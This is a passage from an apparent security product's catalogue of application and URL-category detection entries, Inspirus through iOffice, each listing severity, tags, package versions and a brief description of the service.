Description: Inspirus offers employee engagement that inspires employees through one point of interaction for everyone and brings joy to work, one experience at a time.
Back to top

INSPRO

About this situation: Application INSPRO detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inspro's line of business includes providing insurance agent and broker services for a range of insurance types.
Back to top

Inspur

About this situation: Application Inspur detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inspur is a supplier of computer platforms and solutions for IT application. It develops server and ERP, and software, mobile communication, intelligent terminal, semiconductor.
Back to top

Instagram

About this situation: Instagram usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-523-5211
Last changed: sgpkg-ips-1638-5242
Description: Instagram is an online photo-sharing, video-sharing and social networking service.
Back to top

Installanywhere-Update

About this situation: InstallAnyWhere Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-629-5211
Description: This application is Java-based software for multiple platforms. Source: Wikipedia
Back to top

Instan-T-Desktop-Client

About this situation: Instan-T Desktop Client usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-631-5211
Last changed: sgpkg-ips-773-5211
Description: This service supports MSN, AIM/ICQ, Yahoo, and GTalk instant messaging clients. Source: Interactive Networks
Back to top

Instan-T-Express

About this situation: Instan-T Express usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-773-5211
Description: This service supports MSN, AIM/ICQ, Yahoo, and GTalk.
Back to top

Instant Messaging

About this situation: Sites that enable instant messaging.
Context: URL Application Context
Severity: 1
Tags: Productivity, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable instant messaging.
Back to top

Instant-Computer-backup

About this situation: Application Instant-Computer-backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Instant Computer backup is online cloud-based solution for backup all your devices.
Back to top

Instant-Mobile

About this situation: Application Instant-Mobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Instant Mobile - mobile website builder that provides a complete mobile marketing solution - dedicated mobile CMS and custom mobile themes.
Back to top

InstanteStore

About this situation: Application InstanteStore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InstanteStore is an online shopping cart software that powers small and medium sized businesses to sell online.
Back to top

InstantSurvey

About this situation: Application InstantSurvey detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InstantSurvey is an online survey software with inexpensive online survey tools for creation, distribution, management and analysis of online surveys.
Back to top

Instapaper

About this situation: Instapaper usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1764-5242
Description: Instapaper usage detected. Instapaper is a tool for saving and formatting web page articles for later read.
Back to top

Instart-Logic

About this situation: Application Instart-Logic detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Instart Logic's globally-distributed Cloud Application Delivery is Software-defined application delivery (SDAD) service, built to replace legacy content delivery networks (CDNs).
Back to top

Instiller

About this situation: Application Instiller detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Instiller is the email marketing solution designed specifically for agencies.Enabling you to manage all of your clients in one professional to use application that's feature-rich, branded and can be individually customised for each of your clients.
Back to top

InStream

About this situation: Application InStream detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: inStream is cloud-based wealth management platform that is quickly revolutionizing the way advisors deliver advice and redefining how they manage their practice.
Back to top

Instrumental

About this situation: Application Instrumental detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Instrumental is a hosted application and server monitoring with a beautiful interface, a powerful query language, and advanced alerting.
Back to top

Intacct

About this situation: Application Intacct detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intacct cloud service helps building professional-strength financial management and accounting applications that fit into existing business infrastructure and integrate well with the key applications that run the business.
Back to top

Intalio

About this situation: Application Intalio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intalio provides tools and technologies that businesses use to build agile business applications that include the capabilities that users demand, including collaboration, process automation, mobility and cloud enablement. With this technologies, customers can build and run applications that bring together employees, partners and customers on infrastructure, a private cloud or the public cloud.
Back to top

Intego

About this situation: Application Intego detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intego is the provider of Mac security, protecting Mac users from the dangers of the Internet.
Back to top

Integral

About this situation: Application Integral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Integral develops and operates FX Grid, a global Multi-sided Trading Facility
Back to top

Integral Ad Science

About this situation: Integral Ad Science
Context: Application Context
Severity: 1
Tags: Web Applications, Marketing, Application Routing
First detected in: sgpkg-ips-1725-5242
Last changed: sgpkg-ips-1725-5242
Description: Integral Ad Science is a marketing platform for ads and web analytics.
Back to top

IntegrateCloud

About this situation: Application IntegrateCloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IntegrateCloud is an Integration as a service that allows bi-directional syncing of information between Zendesk and Atlassian Jira..
Back to top

Integrum-QHSE-Risk-and-Compliance-Software

About this situation: Application Integrum-QHSE-Risk-and-Compliance-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: integrum software is a globally deployed integrated management system for Quality, Health Safety Environment, Risk and Compliance and Business Optimization.
Back to top

Intel

About this situation: Intel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-750-5211
Last changed: sgpkg-ips-773-5211
Description: Intel is a multinational technical company. It is one of the largest and valued semiconductor manufacturer in the world.
Back to top

Intel Graphics Control Panel

About this situation: Endpoint Context Agent based Intel Graphics Control Panel detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1147-5242
Description: Intel Graphics Control Panel endpoint application was detected.
Back to top

Intel Services Manager

About this situation: Endpoint Context Agent based Intel Services Manager detection
Context: EI Correlation
Severity: 1
Tags: Non-Essential System Services, Endpoint
First detected in: sgpkg-ips-1093-5242
Last changed: sgpkg-ips-1093-5242
Description: Intel Services Manager endpoint application was detected. Intel Services Manager is a part of Intel AppUp center developed by Intel for Windows-based machines.
Back to top

Intel-Security

About this situation: Application Intel-Security detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intel Security solutions deliver virus protection and Internet security.
Back to top

Intelex

About this situation: Application Intelex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intelex Technologies Inc. is a development and support of software solutions for Environment, Health, Safety and Quality
Back to top

InteliWISE

About this situation: Application InteliWISE detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InteliWISE provides cloud service to the complete customer self-service with Virtual Agent, Live Chat and Help Desk.
Back to top

Intelledox

About this situation: Application Intelledox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intelledox helps organizations to digitalize business processes through smart web forms (eforms), CRM/line of business integration, document automation and data transformation.
Back to top

IntelliEnterprise

About this situation: Application IntelliEnterprise detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IntelliEnterprise is a provider of intranet software to manage content, connect employees and manage content and workflows.
Back to top

IntelligenceBank

About this situation: Application IntelligenceBank detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IntelligenceBank is an online information management platform, share and 'broadcast' their documents, charts and live data.IntelligenceBank provides the following solutions to its blue chip clients:1. Brand Hubs and Digital Asset Management2. Online Board Portals3. Risk and Governance Platforms4. Customer Insights Management.5. Online Knowledge Management6. Online Document Management
Back to top

IntelliJ IDEA

About this situation: Endpoint Context Agent based IntelliJ IDEA detection
Context: EI Correlation
Severity: 1
Tags: Productivity, Endpoint
First detected in: sgpkg-ips-1547-5242
Last changed: sgpkg-ips-1547-5242
Description: IntelliJ IDEA is an integrated development environment (IDE) for developing computer software written in Java and other JVM-based languages.
Back to top

Intellinote

About this situation: Application Intellinote detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intellinote is Team Productivity Platform for teams of all sizes that can capture information, collaborate and complete work from anywhere.
Back to top

intelliSPOT

About this situation: Application intelliSPOT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: intelliSPOT's search engine takes an intuitive human-like approach and uses Contextual Search where keyword occurrences are valued based on the context of their use within a resume.
Back to top

IntenseDebate

About this situation: Application IntenseDebate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IntenseDebate is a comment system for WordPress, Blogger, Tumblr and many other blogging and CMS platforms.
Back to top

Interactive-Accounting

About this situation: Application Interactive-Accounting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interactive Accounting is business and cloud advisors
Back to top

Interactive-Brokers

About this situation: Application Interactive-Brokers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interactive Brokers LLC is a low cost provider of trade execution and clearing services for individuals, advisors, prop trading groups, brokers and hedge funds.
Back to top

Interactivedata

About this situation: Application Interactivedata detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interactive Data Corporation provide financial information. Thousands of financial institutions and active traders, as well as hundreds of software and service providers, subscribe to our fixed income evaluations, reference data, real-time market data, trading infrastructure services, fixed income analytics, desktop solutions and web-based solutions.
Back to top

InterCall

About this situation: Application InterCall detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InterCall is conferencing solutions - audio conferencing, web conferencing, and video conferencing.
Back to top

Intercom

About this situation: Application Intercom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1834-5242
Description: Intercom provides the services consist of a customer relationship management and messaging tool for web app owners.
Back to top

Interlink-Express

About this situation: Application Interlink-Express detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interlink Express provides services for consignments.
Back to top

Intermedia

About this situation: Application Intermedia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intermedias Office in the Cloud suite integrates the essential IT applications that companies need to do business, including email, unified communications, file backup and sharing, productivity, identity and access management, security and archiving.
Back to top

Internal Certificate expires soon

About this situation: The Internal certificate expires soon. Renew internal certificates used in system communications.
Context: Management Server situation
Severity: 3
Tags: Upcoming Events
First detected in: sgpkg-ips-1643-5242
Last changed: sgpkg-ips-1643-5242
Description:
Back to top

Internet Auctions

About this situation: Sites that support the offering and purchasing of goods between individuals.
Context: URL Application Context
Severity: 1
Tags: Shopping, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that support the offering and purchasing of goods between individuals.
Back to top

Internet Communication

About this situation: The parent category that contains the following categories: General Email, Organizational Email, Text and Media Messaging and Web Chat.
Context: URL Application Context
Severity: 1
Tags: Internet Communication, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: The parent category that contains the following categories: General Email, Organizational Email, Text and Media Messaging and Web Chat.
Back to top

Internet Explorer 10

About this situation: Endpoint Context Agent based Internet Explorer 10 detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 10 web browser endpoint application has been detected.
Back to top

Internet Explorer 11

About this situation: Endpoint Context Agent based Internet Explorer 11 detection
Context: EI Correlation
Severity: 1
Tags: Web Browsers, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 11 web browser endpoint application has been detected.
Back to top

Internet Explorer 4

About this situation: Endpoint Context Agent based Internet Explorer 4 detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 4 web browser endpoint application has been detected.
Back to top

Internet Explorer 5

About this situation: Endpoint Context Agent based Internet Explorer 5 detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 5 web browser endpoint application has been detected.
Back to top

Internet Explorer 6

About this situation: Endpoint Context Agent based Internet Explorer 6 detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 6 web browser endpoint application has been detected.
Back to top

Internet Explorer 7

About this situation: Endpoint Context Agent based Internet Explorer 7 detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 7 web browser endpoint application has been detected.
Back to top

Internet Explorer 8

About this situation: Endpoint Context Agent based Internet Explorer 8 detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 8 web browser endpoint application has been detected.
Back to top

Internet Explorer 9

About this situation: Endpoint Context Agent based Internet Explorer 9 detection
Context: EI Correlation
Severity: 1
Tags: Obsolete Web Browsers, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Internet Explorer 9 web browser endpoint application has been detected.
Back to top

Internet Radio and TV

About this situation: Sites that provide online radio or television programming.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that provide online radio or television programming.
Back to top

Internet Telephony

About this situation: Sites that enable users to make phone calls via the Internet or to obtain information or software for that purpose.
Context: URL Application Context
Severity: 1
Tags: Bandwidth, Network Bandwidth Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that enable users to make phone calls via the Internet or to obtain information or software for that purpose.
Back to top

Internet-Archive-Wayback-Machine

About this situation: Internet Archive Wayback Machine usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Internet Archive Wayback Machine usage has been detected.
Back to top

Internet-Disk

About this situation: Internet Disk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a data storage service that offers centralized management of automated data synchronization. Internet disk allows data to be secured and accessed through high speed automated backup tools.
Back to top

InternetBS

About this situation: Application InternetBS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Internet.bs provides Internet-based domain registration services.
Back to top

InternMatch

About this situation: Application InternMatch detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InternMatch helps students find amazing internships.InternMatch helps students get to know companies through video, pictures of the office and employees, and the ability ask questions all year round directly to a hiring manager.
Back to top

Internships.com

About this situation: Application Internships.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Internships.com is web venture that is part of CareerArc Group, focused on providing internship resources and services for students, employers and educators. The site offers free internship searching, posting and a library of resources from career experts as well as a researched guide on U.S.
Back to top

Interoute

About this situation: Application Interoute detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interoute is an telecommunications service provider and the owner operator of cloud services platform.
Back to top

Interpristor

About this situation: Application Interpristor detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interpristor is osCommerce compatible program that uses all data and shipping and payment modules.
Back to top

Intershop

About this situation: Application Intershop detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intershop is the provider of enterprise solutions for omni-channel commerce. More than 300 large and mid-sized companies around the world already benefit from our expertise. Companies like Hewlett-Packard, BMW, Bosch, Mister Spex, and Deutsche Telekom.
Back to top

Interspire

About this situation: Application Interspire detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interspire provides email marketing software to create, send, track email marketing, tools to automate marketing and customer feedback.
Back to top

Interstate

About this situation: Interstate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Interstate provides real time activity like It always important to be up to date with your team, real-time activity makes this a breeze. It has real time chat system which allows quick communication and work+discuss possibilities. you can embed your roadmap anywhere using interstate.
Back to top

Intersystems

About this situation: Application Intersystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InterSystems Corporation is a privately held software company with offices in 25 countries and corporate headquarters in Cambridge, Massachusetts. InterSystems advanced database, integration, and analytics technologies provide a unified platform for breakthrough applications in healthcare, financial services, and other industries that require the highest reliability and performance.
Back to top

Interval

About this situation: Application Interval detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intervals is web-based time tracking, task management, and project management for small businesses that need to know where all of their time is going.
Back to top

Interway

About this situation: Application Interway detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The InterWay Company focuses on complex web solutions, IT solutions and the latest trend in the informational technologies - Software as a Service.
Back to top

InterWeave

About this situation: Application InterWeave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interweave is the publisher of high quality art and craft magazines, books, TV Shows, and ePatterns and eProjects.
Back to top

InterWeave-Smart-Solutions

About this situation: Application InterWeave-Smart-Solutions detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InterWeave offers CRM, Financial, ERP, Billing, eCommerce, Telephony, Customer Service applications ready to integrate and configure in a 'Self-Service SaaS' model.
Back to top

Interxion

About this situation: Application Interxion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Interxion provider of carrier and cloud-neutral colocation data centre services in Europe.
Back to top

Intolerance

About this situation: Sites that condone intolerance towards any individual or group.
Context: URL Application Context
Severity: 1
Tags: Intolerance, Legal Liability
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that condone intolerance towards any individual or group.
Back to top

Intralinks

About this situation: Application Intralinks detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intralinks is a provider of inter-enterprise content management and collaboration solutions that enables the exchange, control, and management of information between organizations through their software a a service solutions.
Back to top

Intrasoft-intl

About this situation: Application Intrasoft-intl detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: INTRASOFT International is a European IT Solutions and Services Group with strong international presence, offering innovative and added-value solutions of the highest quality to a wide range of international and national public and private organisations.
Back to top

Intrix-Project

About this situation: Application Intrix-Project detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intrix Project is used as a tool for project management in construction, architecture bureaus, advertising and marketing agencies, municipalities, IT departments, translation agencies and other companies, which are in any way related to projects or are project-organized.
Back to top

Introhive

About this situation: Application Introhive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Introhive is a relationship analytics platform for improve sales and marketing for reps, managers and executives. By analyzing the connections in a company, it create an enterprise-wide view of relationships with customers and prospects.
Back to top

Intronis-Online-Backup

About this situation: Application Intronis-Online-Backup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Intronis Online Backup is data protection system for the IT channel, Cloud Backup and Disaster Recovery, the secure cloud backup and recovery solutions to easily manage clients backup requirements
Back to top

Intuit

About this situation: Intuit usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1764-5242
Description: Intuit is a developer of multiple financial and business software, such as TurboTax.
Back to top

Intuit-Payroll

About this situation: Intuit Payroll usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Intuit Payroll consists of payroll services and software solutions for small businesses, either online or within QuickBook. Online Payroll Services from Intuit make it easy to run payroll anywhere, anytime. Print paychecks, payroll forms, error free taxes, live help and more.
Back to top

Invalid_Record

About this situation: Invalid Record Received
Context: Log Server situations
Severity: 1
Tags: SMC
First detected in: sgpkg-ips-490-5211
Last changed: sgpkg-ips-490-5211
Description: Invalid record was received to log server
Back to top

Investis

About this situation: Application Investis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Investis helps companies to communicate with, engage and understand their audience so they can build stronger, trusted connections with the people that matter.
Back to top

InvGate

About this situation: Application InvGate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InvGate is a web-based software to manage, analyze, automate your IT Service Desk and control, maintain and efficiently manage your IT Assets.
Back to top

Invisible-Surf

About this situation: Invisible Surf usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Anonymizers/Proxies, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: An anonymizing proxy service
Back to top

InVision

About this situation: Application InVision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InVision provides cloud services and training for call centers, workforce management software solutions.
Back to top

Invitbox

About this situation: Application Invitbox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Invitbox is the online automatic data-extraction mailbox for receipt, approval and storage of supplier bills
Back to top

InviteBox

About this situation: Application InviteBox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InviteBox is marketing platform. With InviteBox you can launch your own referral program in minutes and make your existing customers bring you more business.
Back to top

Invoice-Journal

About this situation: Invoice Journal usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Invoice Journal is a web-based invoicing software that lets you create, track and store invoices online.
Back to top

Invoice-Studio

About this situation: Application Invoice-Studio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Invoice Studio is Online Invoicing Software for small business owners, professional consultants, sole traders, and self-employed people.
Back to top

Invoicedude

About this situation: invoicedude usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Invoice Dude is a free online invoicing application for small business. Although many tools exist like this, but Invoice Dude is 100% free to use software. Some basic features includes recurring invoices, multiple currencies, paypal integration, interactive dashboard, optional client panel.
Back to top

Invoicera

About this situation: Invoicera usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Invoicera is an online invoicing application that was founded with the mission of simplifying business communication. Simplify the process of account receivable, management by facilitating a platform that lets suppliers and vendors interact with each other with ease, without the need of a phone call or an email.
Back to top

Invotrak

About this situation: Application Invotrak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Invotrak is a full-featured online invoicing and timesheet tracking application
Back to top

InVox

About this situation: Application InVox detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: InVox provides Business Phone System with VOIP hosted PBX, click to call, IVR services, CRM integration, virtual call center, phone API's.
Back to top

Inwx

About this situation: Application Inwx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Inwx provides domain registration service.
Back to top

INX-Software

About this situation: Application INX-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: INX Software provides browser and mobile-capable solution for workforce logistics, safety, competence, compliance, health, obligations and environment.
Back to top

IOActive

About this situation: Application IOActive detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: IOActive is the consultancy in hardware, software, and wetware assessments.
Back to top

iOffice

About this situation: Application iOffice detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
